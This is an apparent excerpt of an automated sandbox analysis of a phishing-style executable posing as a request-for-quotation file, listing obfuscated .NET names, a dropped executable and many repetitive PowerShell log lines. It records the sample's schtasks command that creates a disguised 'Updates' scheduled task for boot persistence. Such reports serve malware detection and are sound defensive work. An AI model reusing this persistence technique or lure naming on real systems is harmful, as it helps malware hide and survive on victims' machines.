                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, LF6Z39NPmJiiGMGn5i.csHigh entropy of concatenated method names: 'bMf3bTbBrJ', 'KPv3hE4eqS', 'sZu37uYUXL', 'o9N3qOJSUi', 'AOT3xqt3Gv', 'UtQ3tXfwaT', 'zn7O1X9cU5rqgcjeHW', 'Ub9ZHSFh9wtGPVrqic', 'SAT33gW8Ja', 'vF23dbwOJe'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, oxcHW9d8Tk42VoYgoA.csHigh entropy of concatenated method names: 'ToString', 'vNEtVKu3Uf', 'M6dt5HIixC', 'eXntAxZmZe', 'M9wtcUcIVv', 'Tmit9MLtZX', 'T1pt8AloPu', 'YbltsbiKEQ', 'l6xtHy4Tm8', 'NyMtGBS2Mk'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, qhA7Vpw3Pa7m92Y2sb.csHigh entropy of concatenated method names: 'dTNWeujeSd', 'iYVWSYhiaU', 'tscWpRbRNj', 'jVfW0hrTja', 'hCEWiwQGhk', 'K81WnWuqof', 'U0QWDf0GSH', 'JjpW6VpIfI', 'JZwWIMiRDM', 'PGJWKfNIFR'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, Y06dj4BVu05CPVc5SN.csHigh entropy of concatenated method names: 'V7kuxExQyi', 'Ho4uXKx9l2', 'jP6uurjn06', 'iHsuaxZvCG', 'W1IuwPC2E0', 'UTAuUTMDCu', 'Dispose', 'fv3NoOCjDZ', 'v1pNW12oeA', 'A8jNFkrDbl'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, C9unB7URCgbFq78hEl.csHigh entropy of concatenated method names: 'bBSBFo5S2p', 'Bn0BghXOym', 'V6DBrc8Guc', 'hGJBbCRdIP', 'kufBuXeU3Z', 'T3BBhV94li', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, YXd5RkTUGDmJACNkFp.csHigh entropy of concatenated method names: 'ERXbC99M8p', 'kELbTsI4iF', 'WQ2byIGFqj', 'n94bLd9y5x', 'LJRbZwkA3B', 'FH5bjDDUic', 'eLHbkggdCY', 'WY4b1LcP1Q', 'SJlb2v9GqW', 'K68b4uJxWU'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, h6mhv9m54O6mTAWZxY.csHigh entropy of concatenated method names: 'CobFLlZaNc', 'vGeFjA8pEL', 'gZBF1B5JKa', 'MCWF2Xvsoh', 'XPUFxa7hIm', 'R2mFt7oGgM', 'vJnFXarwvQ', 'gliFNUh8YG', 'e9xFuc5lEn', 'tRCFBN8GEx'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, Fnk71RzLmXXcJ9kRSj.csHigh entropy of concatenated method names: 'OjYBjhSHDP', 'iq3B180i3V', 'pK0B2mt0jD', 'nBIBvlYdqP', 'GKKB5oUrnt', 'F39Bc6dDNl', 'wwnB96nrJV', 'pXXBUibPEX', 'PWdBCsBA2X', 'KmlBTxgNKj'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, jf4Qf9XFgnwgV28YTi.csHigh entropy of concatenated method names: 'LU7X6yKwwO', 'ISNXK8UhhP', 'lAnNYVD5mk', 'cITN3tObOJ', 'n5mXVkRMfN', 'uyHXRf6GiT', 'OQGXQHsEOu', 'zVlXeyZ2Pr', 'y5yXSYt5pI', 'N8VXpxKA67'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, EXP714sBm2ctecZFQ5.csHigh entropy of concatenated method names: 'hTYuvl4xpZ', 'sKtu5ecsIW', 'FqDuAA9oIZ', 'pXLucgpQL6', 'RYNu9usi7e', 'iNru8fEyeF', 'gBQus4m7dM', 'fa9uHwZDnS', 't1cuGvSYmu', 't17uENLuNW'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, yNnsJdCNHPcY1XMT4rt.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XNkmu7q24b', 'gNxmBtjkrZ', 'R1smaTOOob', 'LaLmmZZcrV', 'A2smwgDiCu', 'EOTmfqKLHX', 'LbLmUk5BJV'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, l4lWgpboLH3dw1sHJl.csHigh entropy of concatenated method names: 'rTwdlcsTgq', 'HyWdoo6g6I', 'yKTdWP9ikF', 'H7xdF0mS7h', 'FYZdg3Wwkf', 'qekdrrnCSx', 'RK9dbyCdGa', 'OLqdh3KEI9', 'JYidObD6cT', 'z7Hd7Ex7S4'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, vfkoEZCFRkJoTb50MAj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OIiBVwsHY5', 'a7hBRF6Y7C', 't2wBQNBWNV', 'APCBe1RjgL', 'KMrBSL5Ecj', 'O9EBpBC8Zw', 'xcBB05MyWo'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, NZGTi0WPFvt2i5LQMG.csHigh entropy of concatenated method names: 'ri2y7SFRe', 'nTtLtuH5s', 'UH7jK2aBj', 'EXRkxhCPh', 'On82QQf23', 'usx4Dg4ga', 'sgvU1JgIDJmVl5YaZH', 'BFu7LaGxdjqHuT5R8D', 'mCaNhwp54', 'dyNB0qmvq'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, dBMNChvaYpUXNoIXaf.csHigh entropy of concatenated method names: 'EYYboTeDi7', 'SwkbFM5Quw', 'rVRbrR03bo', 'NKMrKCAPW4', 'hKlrzIxIYb', 'aRRbY4PAX7', 'EUSb3PLF5i', 'RMHbJP2adb', 'ydmbdDU2jT', 'MIfbPyPB1D'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, mjll2lncEU9TxwTknr.csHigh entropy of concatenated method names: 'nlyM1yS4VI', 'QiXM2rNf0U', 'sS2MvvqiMQ', 'kB7M5cMXUq', 'G3WMcU8rhr', 'tEIM9IxnHI', 'hmNMsO57WX', 'qH2MH88X4l', 'xRJMExZIy5', 'xwMMVM96J0'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, By1IY6fiKcunMsajFa.csHigh entropy of concatenated method names: 'Gn0gZsZYa6', 'UjlgkA48Ww', 'sbdFAl4OtR', 'hGmFcv6Anq', 'lNlF9IpO7O', 'zxlF8qP1ns', 'y4yFsbD2ox', 'AXmFH6SISU', 'y5gFGRFD4w', 'SJdFEmoMOL'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, YChN0VCCf5YB3QfasmB.csHigh entropy of concatenated method names: 'jrDBKbxL56', 'NWmBz3tsCr', 'iBOaYDGYWt', 'bf8a3g8NES', 'gyEaJHsYIt', 'UW0adblTAv', 'DRtaP38MVY', 'B5ZalWiOFD', 'hZOaocUkO7', 'v51aWjGYF2'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, gAaOnDG3SbsRr2mZsZ.csHigh entropy of concatenated method names: 'Dispose', 'd8J3ISldek', 'gdIJ5YU2vT', 'rBmmiUHWfk', 'v563KI3Q0J', 'SCl3zEgFXl', 'ProcessDialogKey', 'jWqJYqZSjK', 'vyBJ3s2dAV', 'XiPJJEOxB9'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, Lv1bZR1o53kqNJhWi9.csHigh entropy of concatenated method names: 'I1irl7ttmn', 'OYnrWTXYTC', 'wvSrg7WJae', 'ysfrbfYN8p', 'QVArhCZppW', 'q1WgifatSk', 'gJPgnxHaiU', 'lQngD3LSdm', 'F5yg6d1kfE', 'JLvgIyDFcn'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, LF6Z39NPmJiiGMGn5i.csHigh entropy of concatenated method names: 'bMf3bTbBrJ', 'KPv3hE4eqS', 'sZu37uYUXL', 'o9N3qOJSUi', 'AOT3xqt3Gv', 'UtQ3tXfwaT', 'zn7O1X9cU5rqgcjeHW', 'Ub9ZHSFh9wtGPVrqic', 'SAT33gW8Ja', 'vF23dbwOJe'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, oxcHW9d8Tk42VoYgoA.csHigh entropy of concatenated method names: 'ToString', 'vNEtVKu3Uf', 'M6dt5HIixC', 'eXntAxZmZe', 'M9wtcUcIVv', 'Tmit9MLtZX', 'T1pt8AloPu', 'YbltsbiKEQ', 'l6xtHy4Tm8', 'NyMtGBS2Mk'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, qhA7Vpw3Pa7m92Y2sb.csHigh entropy of concatenated method names: 'dTNWeujeSd', 'iYVWSYhiaU', 'tscWpRbRNj', 'jVfW0hrTja', 'hCEWiwQGhk', 'K81WnWuqof', 'U0QWDf0GSH', 'JjpW6VpIfI', 'JZwWIMiRDM', 'PGJWKfNIFR'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, Y06dj4BVu05CPVc5SN.csHigh entropy of concatenated method names: 'V7kuxExQyi', 'Ho4uXKx9l2', 'jP6uurjn06', 'iHsuaxZvCG', 'W1IuwPC2E0', 'UTAuUTMDCu', 'Dispose', 'fv3NoOCjDZ', 'v1pNW12oeA', 'A8jNFkrDbl'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, C9unB7URCgbFq78hEl.csHigh entropy of concatenated method names: 'bBSBFo5S2p', 'Bn0BghXOym', 'V6DBrc8Guc', 'hGJBbCRdIP', 'kufBuXeU3Z', 'T3BBhV94li', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, YXd5RkTUGDmJACNkFp.csHigh entropy of concatenated method names: 'ERXbC99M8p', 'kELbTsI4iF', 'WQ2byIGFqj', 'n94bLd9y5x', 'LJRbZwkA3B', 'FH5bjDDUic', 'eLHbkggdCY', 'WY4b1LcP1Q', 'SJlb2v9GqW', 'K68b4uJxWU'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, h6mhv9m54O6mTAWZxY.csHigh entropy of concatenated method names: 'CobFLlZaNc', 'vGeFjA8pEL', 'gZBF1B5JKa', 'MCWF2Xvsoh', 'XPUFxa7hIm', 'R2mFt7oGgM', 'vJnFXarwvQ', 'gliFNUh8YG', 'e9xFuc5lEn', 'tRCFBN8GEx'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, Fnk71RzLmXXcJ9kRSj.csHigh entropy of concatenated method names: 'OjYBjhSHDP', 'iq3B180i3V', 'pK0B2mt0jD', 'nBIBvlYdqP', 'GKKB5oUrnt', 'F39Bc6dDNl', 'wwnB96nrJV', 'pXXBUibPEX', 'PWdBCsBA2X', 'KmlBTxgNKj'
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeFile created: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp"
                Source: C:\Windows\System32\wbem\WMIADAP.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WmiApRpl\Performance

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance Performance Data
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
